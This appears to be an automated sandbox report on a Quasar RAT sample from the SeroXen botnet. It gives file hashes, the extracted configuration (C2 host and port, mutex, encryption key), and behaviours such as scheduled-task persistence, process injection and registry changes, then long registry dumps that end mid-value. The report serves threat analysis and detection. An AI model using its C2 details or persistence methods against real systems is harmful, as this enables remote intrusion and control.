quasar | abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6

Analysis

max time kernel
1800s
max time network
1504s
platform
windows11-21h2_x64
resource
win11-20240419-en
resource tags

arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
submitted
11/05/2024, 08:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Uni.exe
Size

409KB
MD5

4c2bb0618a6eda615c8001d5a7ccd6c0
SHA1

c88d2c8bfc5906a5cfef78893d1132edcffd71f0
SHA256

abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6
SHA512

6abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027
SSDEEP

12288:rpg6M1i1v6q1ak/e7xlX7nnvGAwhJLJO:lxqiii6xlLvGjhO

Score

10^/10

quasar seroxen spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen

tue-jake.gl.at.ply.gg:29058

Mutex

$Sxr-xPAuDxLNyBmZ7S2WLJ

Attributes

encryption_key
Pw78RUs175dFrKD7lMwH
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
SeroXen
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/memory/3584-1-0x0000000000390000-0x00000000003FC000-memory.dmp	family_quasar
behavioral1/files/0x001a00000002ab3b-11.dat	family_quasar

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2304 created 2184	2304	WerFault.exe	128

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 2572 created 632	2572	powershell.EXE	5
PID 908 created 632	908	powershell.EXE	5
PID 3804 created 632	3804	powershell.EXE	5
PID 4636 created 2184	4636	svchost.exe	128

Executes dropped EXE 5 IoCs

pid	Process
4132	Client.exe
4416	install.exe
2812	install.exe
656	tUCkOmZwRnsY.exe
2156	install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
10	raw.githubusercontent.com
25	raw.githubusercontent.com
1	raw.githubusercontent.com
4	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Drops file in System32 directory 19 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk	DllHost.exe
File opened for modification	C:\Windows\System32\Tasks\$77Client.exe	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Tasks\$77svc64	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Privacy-Auditing%4Operational.evtx	svchost.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2572 set thread context of 2600	2572	powershell.EXE	94
PID 908 set thread context of 4876	908	powershell.EXE	95
PID 3804 set thread context of 4800	3804	powershell.EXE	125

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5104	SCHTASKS.exe
4424	schtasks.exe
2036	SCHTASKS.exe
2132	schtasks.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\11ef2c29_0	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\11ef2c29_0\ = "{2}.\\\\?\\hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\elineouttopo/00010001\|\\Device\\HarddiskVolume2\\Users\\Admin\\AppData\\Local\\Temp\\tUCkOmZwRnsY.exe%b{00000000-0000-0000-0000-000000000000}"	svchost.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE

Modifies registry class 40 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\MuiCache	ScreenClippingHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 = "\\\\?\\Volume{E9075ED3-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3f8be388a6e5d5acd16bab84d000b62642e0ed51d2c81a8c6f3d4368ea05250f"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f = "\\\\?\\Volume{E9075ED3-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3f8be388a6e5d5acd16bab84d000b62642e0ed51d2c81a8c6f3d4368ea05250f"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 = "\\\\?\\Volume{E9075ED3-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\edc232bc484ce24bf6217939837fc6cbf03892ad9dff10d3c6fe8cbac931b9a6"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000044accec381a3da0144accec381a3da0144accec381a3da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ab5825482000656463323332626334383463653234626636323137393339383337666336636266303338393261643964666631306433633666653863626163393331623961360000b20009000400efbeab582548ab5825482e00000000000000000000000000000000000000000000000000bc227900650064006300320033003200620063003400380034006300650032003400620066003600320031003700390033003900380033003700660063003600630062006600300033003800390032006100640039006400660066003100300064003300630036006600650038006300620061006300390033003100620039006100360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001e6bfc981000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65646332333262633438346365323462663632313739333938333766633663626630333839326164396466663130643363366665386362616339333162396136000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000075626c6e6a7268660000000000000000e402feced506964aba942aaf5ab964638f48d9e434feee118e664e00a0a556b8e402feced506964aba942aaf5ab964638f48d9e434feee118e664e00a0a556b8d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003400370034003400390030003100340033002d0033003200320031003200390032003300390037002d0034003100360038003100300033003500300033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000d35e07e9000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000003cd2f4c381a3da01357f43c481a3da01357f43c481a3da01564407000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ab5825482000656463323332626334383463653234626636323137393339383337666336636266303338393261643964666631306433633666653863626163393331623961360000b20009000400efbeab582548ab5825482e00000000000000000000000000000000000000000000000000bc227900650064006300320033003200620063003400380034006300650032003400620066003600320031003700390033003900380033003700660063003600630062006600300033003800390032006100640039006400660066003100300064003300630036006600650038006300620061006300390033003100620039006100360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e